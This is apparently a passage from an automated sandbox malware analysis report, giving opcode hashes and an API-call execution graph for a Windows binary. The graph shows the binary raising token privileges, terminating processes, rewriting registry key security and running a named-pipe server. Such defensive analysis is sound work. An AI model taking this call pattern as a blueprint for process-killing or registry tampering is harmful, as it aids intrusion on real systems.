                            • Instruction Fuzzy Hash: BFE020364096058BD750BD70C4889A5F3F1FF60309F1044B9F08B87251DE39F541C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction ID: 4db15a6ba56f69010e0d889ba2bf534927f51a10e5e0ab4e6dd5c08b7754d823
                            • Opcode Fuzzy Hash: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction Fuzzy Hash: FAE0483555870A8BD315AE16C084666F3E2EF41305F20457AE08F477D1CB38F906C745
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8cbc90dc5344b2cbb463adf8e3f64da92710a0a07e74fe9a1ae0ce89de17068a
                            • Instruction ID: 2fbe6627fe6e226cfaade1098b5164a5b51756a8a004ed76e3846d61e3e9b92b
                            • Opcode Fuzzy Hash: 8cbc90dc5344b2cbb463adf8e3f64da92710a0a07e74fe9a1ae0ce89de17068a
                            • Instruction Fuzzy Hash: 8DE08C61A18A089FD386EF5880C0C9EBAE0EBA5744F00007BF08AC32A2EE31D4428712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35d6c7a449c44bdf6aaaccd5ca0bd688a7a15ae662aec1b6782d1452b2949f09
                            • Instruction ID: 8f550a317d2660dcc998fad9911e1192457d705d772df4d209aafad1566315b7
                            • Opcode Fuzzy Hash: 35d6c7a449c44bdf6aaaccd5ca0bd688a7a15ae662aec1b6782d1452b2949f09
                            • Instruction Fuzzy Hash: B3C01227B596421AF250A458984B5E077C1E7552D17511576D526870A4FA545C471180
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0e0ad35e43dca7cb80864bdc37599457ef7cbc205cf8aa57a0ec2bdae55d877
                            • Instruction ID: 8cfd3401e6799e55156c0e4bdfbb9de949e3771ba98c130d5247b6434e7817d9
                            • Opcode Fuzzy Hash: c0e0ad35e43dca7cb80864bdc37599457ef7cbc205cf8aa57a0ec2bdae55d877
                            • Instruction Fuzzy Hash: 2FD01217B0C44B07B94CA82D505A1BD46C34BC6654A1345BFE01B867D6CC2D55431342
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction ID: c31c437e0e7b1a7ca8da8c15a589878e756ceb813880e6b533bf7d39e37b54ae
                            • Opcode Fuzzy Hash: a6b8ef0ff66e05dfb1432f3bf5cf0af358f2430edffbb92dd51baa69d5416e26
                            • Instruction Fuzzy Hash: ECD0A76A42D6C38BE315DE35C4C4735BB80AF0131CF2546FDE4974A4D3A62CE50AD609
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74d963b915e518b9f72c3a935038fda2c245fb70b0129928fafbe9b1d44e4930
                            • Instruction ID: 3ad420c5e44d84a97cdbad5a70f12adff6b104a0c365e06beb7b116072341ade
                            • Opcode Fuzzy Hash: 74d963b915e518b9f72c3a935038fda2c245fb70b0129928fafbe9b1d44e4930
                            • Instruction Fuzzy Hash: F2C01298914B1E8E52546A69044412C73C0DB48544B90007E980AD3293DC586C234345
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567911fe2aea1ba09de7f01ad76422bfef49018766f1a651103e5c2ed1f2e077
                            • Instruction ID: fc19b294fc3dc28a3095255a22655ffaa0d1010b453d2009589f0b0d022dfa31
                            • Opcode Fuzzy Hash: 567911fe2aea1ba09de7f01ad76422bfef49018766f1a651103e5c2ed1f2e077
                            • Instruction Fuzzy Hash: BED01202A1D1454AD6061A6954602AD58D64F89314F3802F7F04EC32D7EC2E59128106
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1136156403431e07a30655801a968ed35ebf387734be02e1227ac7a6ca2d6ff3
                            • Instruction ID: f94f8c97528438a017bca9212b46742616b1cb52f6ea8c95678f48a63631bf8a
                            • Opcode Fuzzy Hash: 1136156403431e07a30655801a968ed35ebf387734be02e1227ac7a6ca2d6ff3
                            • Instruction Fuzzy Hash: 9BC0123353924647911CDA14405282DF3D5B789A05F50593EF08782181DBA5A8024542
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aabf96123ac02084beb2ed045f485f4eec34d5b18ce28e67eb3b7c7e3acedb78
                            • Instruction ID: bd35cefdc6937ad17d9c32e3bb2a4c0a32f06eb43da408d079783ffc57979eaa
                            • Opcode Fuzzy Hash: aabf96123ac02084beb2ed045f485f4eec34d5b18ce28e67eb3b7c7e3acedb78
                            • Instruction Fuzzy Hash: 56B0926BB24A2B3BA6D4B779029E27960D2AF9910479044B6A81FE3A97EC1C6C010250
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27de5500e6a8ec58bae6333ea9d0b039a117be2cd2eb2287063958e9b6096609
                            • Instruction ID: e8983f92781e61a083ee831fb73b3f595b98e3cf4a3c0cf14edd90d59e761664
                            • Opcode Fuzzy Hash: 27de5500e6a8ec58bae6333ea9d0b039a117be2cd2eb2287063958e9b6096609
                            • Instruction Fuzzy Hash: 68B01230C4360B41DA183531194704831909B05104FC00575D40440141E86F51D74242
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ba340c23a20c3cdffed3746b77d2a2fb3f1b31a75f52a5baf09d78746ccef11
                            • Instruction ID: d8f9cac43927b757bcf2683e56067a0631b312e12a737266c0fa22b486cb67d0
                            • Opcode Fuzzy Hash: 1ba340c23a20c3cdffed3746b77d2a2fb3f1b31a75f52a5baf09d78746ccef11
                            • Instruction Fuzzy Hash: ECA0110023CA0A2BA0C8B2EA008C220A8C38B88200B8880B2288EC2382FC2888000222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000021.00000002.525876106.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_33_2_7fff7e400000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1bb32c70afc5c4c58b90eafa69d177c11959768e797f16ae2c21183afad67016
                            • Instruction ID: 1a1ac8d1c57b46f5fb9f773e5faeb8b582ff81569e5acae5887cce3c3fd7bd66
                            • Opcode Fuzzy Hash: 1bb32c70afc5c4c58b90eafa69d177c11959768e797f16ae2c21183afad67016
                            • Instruction Fuzzy Hash: 58A01102A0828A83FE202A8280A223C888A0F82300E2200B3A00B0A8C28C0CAA030203
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:7.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:6%
                            Total number of Nodes:1443
                            Total number of Limit Nodes:37
                            [Execution graph figure: rendered from an embedded node/edge listing of function addresses in the 0x140000000 image range, with nodes labelled by the API and CRT calls they reach (GetProcessHeap, HeapReAlloc, GetProcAddress, GetModuleFileNameW, SetUnhandledExceptionFilter, FindFirstFileExW, TlsGetValue, MultiByteToWideChar, WideCharToMultiByte, EnterCriticalSection, and CRT internals such as _invalid_parameter_noinfo, __free_lconv_num, _set_fmode, __scrt_fastfail, __scrt_acquire_startup_lock, _RTC_Initialize); the raw node/edge listing is omitted.]
7436->7440 7437->7433 7437->7434 7437->7436 7439 140006e64 __free_lconv_num 5 API calls 7437->7439 7438->7433 7439->7436 7440->7434 7442 14000710c 7441->7442 7443 14000663c _set_fmode 5 API calls 7442->7443 7443->7435 7099 140002e7d 7100 140002eb8 7099->7100 7101 140002e9c 7099->7101 7101->7100 7108 140003758 7101->7108 7106 140005a88 21 API calls 7107 140002ede 7106->7107 7109 1400039dc 24 API calls 7108->7109 7110 140002eca 7109->7110 7111 14000376c 7110->7111 7112 1400039dc 24 API calls 7111->7112 7113 140002ed6 7112->7113 7113->7106 7209 14000b0fd 7210 14000663c _set_fmode 5 API calls 7209->7210 7211 14000b102 7210->7211 7212 140006460 _invalid_parameter_noinfo 5 API calls 7211->7212 7213 14000b10d 7212->7213 6424 140001f00 AllocateAndInitializeSid 6425 140001f72 SetEntriesInAclW 6424->6425 6426 1400020e5 6424->6426 6425->6426 6427 140001fb8 LocalAlloc 6425->6427 6429 140002200 _handle_error 8 API calls 6426->6429 6427->6426 6428 140001fd8 InitializeSecurityDescriptor 6427->6428 6428->6426 6431 140001fec SetSecurityDescriptorDacl 6428->6431 6430 1400020fb 6429->6430 6431->6426 6432 140002007 6431->6432 6433 140002020 CreateNamedPipeW 6432->6433 6434 140002070 ConnectNamedPipe 6433->6434 6435 140002060 Sleep 6433->6435 6436 1400020cf Sleep 6434->6436 6437 14000207f ReadFile 6434->6437 6435->6433 6438 1400020da DisconnectNamedPipe 6436->6438 6437->6438 6439 14000209f WriteFile DisconnectNamedPipe 6437->6439 6438->6434 6439->6434 7215 140004d40 7216 140004d59 7215->7216 7225 140004d55 7215->7225 7217 1400081c8 30 API calls 7216->7217 7218 140004d5e 7217->7218 7227 1400086a8 GetEnvironmentStringsW 7218->7227 7221 140004d6b 7224 140006e64 __free_lconv_num 5 API calls 7221->7224 7224->7225 7226 140006e64 __free_lconv_num 5 API calls 7226->7221 7228 1400086d6 7227->7228 7238 140008778 7227->7238 7231 140008610 WideCharToMultiByte 7228->7231 7229 140008782 FreeEnvironmentStringsW 7230 140004d63 7229->7230 7230->7221 7239 140004dac 7230->7239 7232 140008728 7231->7232 
7233 140006d8c 5 API calls 7232->7233 7232->7238 7234 140008737 7233->7234 7235 140008610 WideCharToMultiByte 7234->7235 7236 140008761 7234->7236 7235->7236 7237 140006e64 __free_lconv_num 5 API calls 7236->7237 7237->7238 7238->7229 7238->7230 7240 140004dd3 7239->7240 7241 140006dec _invalid_parameter_noinfo 5 API calls 7240->7241 7250 140004e08 7241->7250 7242 140004e77 7243 140006e64 __free_lconv_num 5 API calls 7242->7243 7244 140004d78 7243->7244 7244->7226 7245 140006dec _invalid_parameter_noinfo 5 API calls 7245->7250 7246 140004e68 7254 140004eb4 7246->7254 7248 140005aa8 __std_exception_copy 5 API calls 7248->7250 7250->7242 7250->7245 7250->7246 7250->7248 7251 140004e9f 7250->7251 7253 140006e64 __free_lconv_num 5 API calls 7250->7253 7252 140006e64 __free_lconv_num 5 API calls 7252->7242 7253->7250 7258 140004eb9 7254->7258 7259 140004e70 7254->7259 7255 140004ee2 7257 140006e64 __free_lconv_num 5 API calls 7255->7257 7256 140006e64 __free_lconv_num 5 API calls 7256->7258 7257->7259 7258->7255 7258->7256 7259->7252 7291 140002780 7292 140003548 __std_exception_copy 5 API calls 7291->7292 7293 1400027a9 7292->7293 7294 14000a380 7295 14000a3ad 7294->7295 7296 14000663c _set_fmode 5 API calls 7295->7296 7301 14000a3c2 __vcrt_FlsSetValue 7295->7301 7297 14000a3b7 7296->7297 7298 140006460 _invalid_parameter_noinfo 5 API calls 7297->7298 7298->7301 7299 140002200 _handle_error 8 API calls 7300 14000a71f 7299->7300 7301->7299 7444 14000d9c0 7447 140004780 7444->7447 7446 14000d9d6 7448 140006120 _invalid_parameter_noinfo 5 API calls 7447->7448 7449 14000479e __vcrt_FlsSetValue 7448->7449 7449->7446 7214 140002501 TerminateProcess 6581 14000a804 6582 14000a823 6581->6582 6583 14000a89c 6582->6583 6585 14000a833 6582->6585 6589 1400025e4 6583->6589 6587 140002200 _handle_error 8 API calls 6585->6587 6588 14000a892 6587->6588 6592 1400025f8 IsProcessorFeaturePresent 6589->6592 6593 14000260e 6592->6593 6598 140002694 RtlCaptureContext RtlLookupFunctionEntry 
6593->6598 6599 1400026c4 RtlVirtualUnwind 6598->6599 6600 140002622 6598->6600 6599->6600 6601 1400024dc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6600->6601 7260 140008d44 7261 140008d50 7260->7261 7263 140008d77 7261->7263 7264 140008890 7261->7264 7265 140008895 7264->7265 7266 1400088d0 7264->7266 7267 1400088b6 DeleteCriticalSection 7265->7267 7268 1400088c8 7265->7268 7266->7261 7267->7267 7267->7268 7269 140006e64 __free_lconv_num 5 API calls 7268->7269 7269->7266 6374 140008d08 6375 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6374->6375 6376 140008d18 6375->6376 6383 1400088e0 6376->6383 6378 140008d21 6379 140008d2f 6378->6379 6393 140008b0c GetStartupInfoW 6378->6393 6384 140008928 6383->6384 6385 1400088ff 6383->6385 6387 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6384->6387 6386 14000663c _set_fmode 5 API calls 6385->6386 6388 140008904 6386->6388 6392 140008932 6387->6392 6389 140006460 _invalid_parameter_noinfo 5 API calls 6388->6389 6390 140008910 6389->6390 6390->6378 6392->6390 6404 1400087e8 6392->6404 6394 140008b41 6393->6394 6395 140008bdb 6393->6395 6394->6395 6396 1400088e0 6 API calls 6394->6396 6399 140008bfc 6395->6399 6397 140008b6a 6396->6397 6397->6395 6398 140008b94 GetFileType 6397->6398 6398->6397 6400 140008c1a 6399->6400 6401 140008c75 GetStdHandle 6400->6401 6402 140008ced 6400->6402 6401->6400 6403 140008c88 GetFileType 6401->6403 6402->6379 6403->6400 6405 140006dec _invalid_parameter_noinfo 5 API calls 6404->6405 6408 140008809 6405->6408 6406 14000886b 6407 140006e64 __free_lconv_num 5 API calls 6406->6407 6409 140008875 6407->6409 6408->6406 6411 140006acc 6408->6411 6409->6392 6412 1400066f4 try_get_function GetProcAddress 6411->6412 6413 140006b02 6412->6413 6414 140006b17 InitializeCriticalSectionAndSpinCount 6413->6414 6415 140006b0c __vcrt_FlsSetValue 6413->6415 6414->6415 6415->6408 7175 1400024c8 7178 
140002b68 7175->7178 7179 140002b8b GetSystemTimeAsFileTime GetCurrentThreadId 7178->7179 7180 1400024d1 7178->7180 7183 14000e1c0 7179->7183 7270 140005948 7273 140004f30 7270->7273 7280 140004ef8 7273->7280 7278 140004eb4 5 API calls 7279 140004f58 7278->7279 7281 140004f08 7280->7281 7282 140004f0d 7280->7282 7283 140004eb4 5 API calls 7281->7283 7284 140004f14 7282->7284 7283->7282 7285 140004f24 7284->7285 7286 140004f29 7284->7286 7287 140004eb4 5 API calls 7285->7287 7286->7278 7287->7286 7114 14000a08c 7115 14000a0b4 7114->7115 7122 14000a0c2 7114->7122 7116 1400043a0 21 API calls 7115->7116 7115->7122 7117 14000a0e0 7116->7117 7118 14000a0ee 7117->7118 7119 14000a110 7117->7119 7130 14000c094 7118->7130 7119->7122 7133 14000c048 7119->7133 7124 14000a154 7126 14000a189 7124->7126 7128 1400085b4 MultiByteToWideChar 7124->7128 7125 14000a1a6 7127 1400085b4 MultiByteToWideChar 7125->7127 7126->7122 7129 14000663c _set_fmode 5 API calls 7126->7129 7127->7126 7128->7126 7129->7122 7136 14000c428 7130->7136 7134 1400043a0 21 API calls 7133->7134 7135 14000a150 7134->7135 7135->7124 7135->7125 7138 14000c485 7136->7138 7141 14000c491 7136->7141 7137 140002200 _handle_error 8 API calls 7140 14000c0a7 7137->7140 7138->7137 7139 14000663c _set_fmode 5 API calls 7139->7138 7140->7122 7141->7138 7141->7139 7302 14000518c 7303 1400051f3 7302->7303 7309 1400051a9 __scrt_is_managed_app 7302->7309 7314 140005084 7303->7314 7305 14000522f 7306 140005235 7305->7306 7319 140005248 7305->7319 7309->7303 7311 140005294 GetModuleHandleExW 7309->7311 7312 1400052d1 try_get_function __vcrt_FlsSetValue 7311->7312 7313 1400052ba GetProcAddress 7311->7313 7312->7303 7313->7312 7315 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 7314->7315 7316 1400050a0 7315->7316 7326 1400050bc 7316->7326 7318 1400050a9 7318->7305 7342 1400087ac 7319->7342 7322 140005282 7324 140005294 2 API calls 7322->7324 7323 140005271 GetCurrentProcess TerminateProcess 
7323->7322 7325 140005289 ExitProcess 7324->7325 7327 1400050d2 __vcrt_FlsSetValue 7326->7327 7328 14000512b 7326->7328 7327->7328 7330 140005864 7327->7330 7328->7318 7333 140005550 7330->7333 7332 140005899 7332->7328 7334 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 7333->7334 7335 14000556c 7334->7335 7338 14000573c 7335->7338 7337 140005575 7337->7332 7339 14000576a __vcrt_FlsSetValue 7338->7339 7340 140005762 7338->7340 7339->7340 7341 140006e64 __free_lconv_num 5 API calls 7339->7341 7340->7337 7341->7340 7343 1400087ca 7342->7343 7344 140005255 7342->7344 7346 1400068cc 7343->7346 7344->7322 7344->7323 7347 1400066f4 try_get_function GetProcAddress 7346->7347 7348 1400068f4 7347->7348 7348->7344 7349 14000858c GetCommandLineA GetCommandLineW 6602 14000cc10 6603 14000cc21 CloseHandle 6602->6603 6604 14000cc27 6602->6604 6603->6604 7142 14000ac90 7143 14000ac98 7142->7143 7144 14000acad 7143->7144 7145 14000acc6 7143->7145 7146 14000663c _set_fmode 5 API calls 7144->7146 7149 1400043a0 21 API calls 7145->7149 7150 14000acbd 7145->7150 7147 14000acb2 7146->7147 7148 140006460 _invalid_parameter_noinfo 5 API calls 7147->7148 7148->7150 7149->7150 5711 140002354 5731 140002954 5711->5731 5714 1400024a0 5796 140002c90 IsProcessorFeaturePresent 5714->5796 5715 140002370 __scrt_acquire_startup_lock 5717 1400024aa 5715->5717 5724 14000238e __vcrt_FlsSetValue __scrt_release_startup_lock 5715->5724 5718 140002c90 __scrt_fastfail 7 API calls 5717->5718 5719 1400024b5 5718->5719 5720 140002439 5737 140002ddc 5720->5737 5722 14000243e 5740 140004f70 5722->5740 5724->5720 5730 1400023b3 5724->5730 5787 140005324 5724->5787 5728 14000245a __scrt_is_managed_app 5728->5719 5792 140002ae8 5728->5792 5803 140002f84 5731->5803 5734 140002368 5734->5714 5734->5715 5735 140002983 __scrt_initialize_crt 5735->5734 5805 1400036c8 5735->5805 5813 1400037b0 5737->5813 5815 1400081c8 5740->5815 5742 140002446 5745 140001000 5742->5745 5744 140004f7f 
5744->5742 5821 140008578 5744->5821 6304 140001ac0 5745->6304 5747 140001044 __scrt_fastfail 5748 140001063 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 5747->5748 5749 140001ac0 20 API calls 5748->5749 5750 1400010d1 5749->5750 6322 140004680 5750->6322 5754 1400010e0 __security_init_cookie 5755 1400010e6 OpenProcess 5754->5755 5756 14000117b FindResourceA 5755->5756 5757 1400010fe OpenProcessToken 5755->5757 5760 14000119b SizeofResource 5756->5760 5761 1400013ed 5756->5761 5758 140001172 CloseHandle 5757->5758 5759 140001115 LookupPrivilegeValueW 5757->5759 5758->5756 5759->5758 5762 14000112d AdjustTokenPrivileges 5759->5762 5760->5761 5764 1400011b4 LoadResource 5760->5764 5763 140002200 _handle_error 8 API calls 5761->5763 5762->5758 5767 14000116c try_get_function 5762->5767 5765 1400013fe 5763->5765 5764->5761 5766 1400011c8 LockResource 5764->5766 5765->5728 5768 1400011de __security_init_cookie 5766->5768 5767->5758 6328 140002268 5768->6328 5772 140001260 5774 140001268 RegCreateKeyExW 5772->5774 5773 140001203 5773->5772 5778 14000122f OpenProcess 5773->5778 5775 1400012ab ConvertStringSecurityDescriptorToSecurityDescriptorW 5774->5775 5776 14000137d CreateThread 5774->5776 5779 1400012f3 RegCreateKeyExW 5775->5779 5780 1400012d3 RegSetKeySecurity LocalFree 5775->5780 5777 14000222c 5776->5777 5783 1400013a9 CreateThread 5777->5783 5778->5773 5784 140001242 TerminateProcess CloseHandle 5778->5784 5781 140001372 RegCloseKey 5779->5781 5782 140001330 __security_init_cookie 5779->5782 5780->5779 5781->5776 5786 140001336 RegSetValueExW RegCloseKey 5782->5786 5785 1400013e0 Sleep SleepEx 5783->5785 5784->5773 5785->5761 5786->5781 5788 140005348 5787->5788 5789 14000535a 5787->5789 5788->5720 6369 140005a88 5789->6369 5794 140002af9 5792->5794 5793 140002b09 5793->5730 5794->5793 5795 1400036c8 __scrt_initialize_crt DeleteCriticalSection 5794->5795 5795->5793 5797 140002cb5 __scrt_fastfail 5796->5797 5798 140002cd4 
RtlCaptureContext RtlLookupFunctionEntry 5797->5798 5799 140002d39 __scrt_fastfail 5798->5799 5800 140002cfd RtlVirtualUnwind 5798->5800 5801 140002d6b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5799->5801 5800->5799 5802 140002dbd __scrt_fastfail 5801->5802 5802->5717 5804 140002976 __scrt_dllmain_crt_thread_attach 5803->5804 5804->5734 5804->5735 5806 1400036da 5805->5806 5807 1400036d0 __vcrt_uninitialize_ptd 5805->5807 5806->5734 5809 140003b58 5807->5809 5810 140003b83 5809->5810 5811 140003b66 DeleteCriticalSection 5810->5811 5812 140003b87 5810->5812 5811->5810 5812->5806 5814 140002df3 GetStartupInfoW 5813->5814 5814->5722 5816 1400081d5 5815->5816 5820 14000821a 5815->5820 5825 140006078 5816->5825 5820->5744 5822 140008500 5821->5822 5823 1400043a0 21 API calls 5822->5823 5824 140008524 5823->5824 5824->5744 5826 14000608e 5825->5826 5827 140006089 5825->5827 5832 140006096 5826->5832 5873 140006a30 5826->5873 5868 1400069e8 5827->5868 5830 1400060ad 5830->5832 5876 140006dec 5830->5876 5836 140006110 5832->5836 5892 140005b08 5832->5892 5850 140007f4c 5836->5850 5837 1400060de 5840 140006a30 _invalid_parameter_noinfo GetProcAddress 5837->5840 5838 1400060ce 5839 140006a30 _invalid_parameter_noinfo GetProcAddress 5838->5839 5841 1400060d5 5839->5841 5842 1400060e6 5840->5842 5882 140006e64 5841->5882 5843 1400060ea 5842->5843 5844 1400060fc 5842->5844 5846 140006a30 _invalid_parameter_noinfo GetProcAddress 5843->5846 5887 140005d54 5844->5887 5846->5841 5849 140006e64 __free_lconv_num 5 API calls 5849->5832 6145 140008110 5850->6145 5852 140007f75 6158 140007c58 5852->6158 5855 140007f8f 5855->5820 5857 14000803b 5858 140006e64 __free_lconv_num 5 API calls 5857->5858 5858->5855 5862 140008036 5863 14000663c _set_fmode 5 API calls 5862->5863 5863->5857 5864 140008098 5864->5857 6182 140007a9c 5864->6182 5865 14000805b 5865->5864 5866 140006e64 __free_lconv_num 5 API calls 5865->5866 5866->5864 5901 1400066f4 5868->5901 5872 
14000e2c0 5874 1400066f4 try_get_function GetProcAddress 5873->5874 5875 140006a5e __vcrt_FlsSetValue 5874->5875 5875->5830 5880 140006dfd _invalid_parameter_noinfo 5876->5880 5877 140006e4e 5908 14000663c 5877->5908 5879 1400060c0 5879->5837 5879->5838 5880->5877 5880->5879 5905 140004714 5880->5905 5883 140006e69 HeapFree 5882->5883 5886 140006e89 try_get_function __free_lconv_num 5882->5886 5884 140006e84 5883->5884 5883->5886 5885 14000663c _set_fmode 4 API calls 5884->5885 5885->5886 5886->5832 5939 140005c2c 5887->5939 5889 140005e06 5942 140005cac 5889->5942 5891 140005e1b 5891->5849 6063 140009990 5892->6063 5895 140005b20 5897 140005b53 5895->5897 5898 140005b29 IsProcessorFeaturePresent 5895->5898 5899 140005b38 5898->5899 6084 14000624c 5899->6084 5902 140006755 TlsGetValue 5901->5902 5903 140006750 try_get_function 5901->5903 5902->5872 5903->5902 5904 140006846 GetProcAddress 5903->5904 5904->5902 5911 140004744 5905->5911 5916 140006120 5908->5916 5910 140006645 5910->5879 5914 140006d1c EnterCriticalSection 5911->5914 5915 14000e21d 5914->5915 5917 140006135 try_get_function 5916->5917 5918 140006147 5917->5918 5920 1400069e8 _invalid_parameter_noinfo 2 API calls 5917->5920 5919 140006a30 _invalid_parameter_noinfo GetProcAddress 5918->5919 5922 14000614f SetLastError 5918->5922 5921 14000616a 5919->5921 5920->5918 5921->5922 5924 140006dec _invalid_parameter_noinfo 4 API calls 5921->5924 5922->5910 5925 14000617d 5924->5925 5926 14000619b 5925->5926 5927 14000618b 5925->5927 5928 140006a30 _invalid_parameter_noinfo GetProcAddress 5926->5928 5929 140006a30 _invalid_parameter_noinfo GetProcAddress 5927->5929 5930 1400061a3 5928->5930 5931 140006192 5929->5931 5932 1400061a7 5930->5932 5933 1400061b9 5930->5933 5936 140006e64 __free_lconv_num 4 API calls 5931->5936 5934 140006a30 _invalid_parameter_noinfo GetProcAddress 5932->5934 5935 140005d54 _invalid_parameter_noinfo 4 API calls 5933->5935 5934->5931 5937 1400061c1 5935->5937 5936->5922 5938 
140006e64 __free_lconv_num 4 API calls 5937->5938 5938->5922 5940 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5939->5940 5941 140005c48 5940->5941 5941->5889 5943 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5942->5943 5944 140005cc8 5943->5944 5947 140005f3c 5944->5947 5946 140005cde 5946->5891 5948 140005f84 Concurrency::details::SchedulerProxy::DeleteThis 5947->5948 5949 140005f58 Concurrency::details::SchedulerProxy::DeleteThis 5947->5949 5948->5946 5949->5948 5951 140009450 5949->5951 5952 1400094ec 5951->5952 5955 140009473 5951->5955 5953 14000953f 5952->5953 5956 140006e64 __free_lconv_num 5 API calls 5952->5956 6017 1400095f0 5953->6017 5955->5952 5960 140006e64 __free_lconv_num 5 API calls 5955->5960 5962 1400094b2 5955->5962 5957 140009510 5956->5957 5958 140006e64 __free_lconv_num 5 API calls 5957->5958 5961 140009524 5958->5961 5959 1400094d4 5963 140006e64 __free_lconv_num 5 API calls 5959->5963 5965 1400094a6 5960->5965 5966 140006e64 __free_lconv_num 5 API calls 5961->5966 5962->5959 5967 140006e64 __free_lconv_num 5 API calls 5962->5967 5969 1400094e0 5963->5969 5964 14000954b 5968 1400095aa 5964->5968 5974 140006e64 5 API calls __free_lconv_num 5964->5974 5977 140008d84 5965->5977 5972 140009533 5966->5972 5973 1400094c8 5967->5973 5970 140006e64 __free_lconv_num 5 API calls 5969->5970 5970->5952 5975 140006e64 __free_lconv_num 5 API calls 5972->5975 6005 140008e90 5973->6005 5974->5964 5975->5953 5978 140008d8d 5977->5978 6003 140008e88 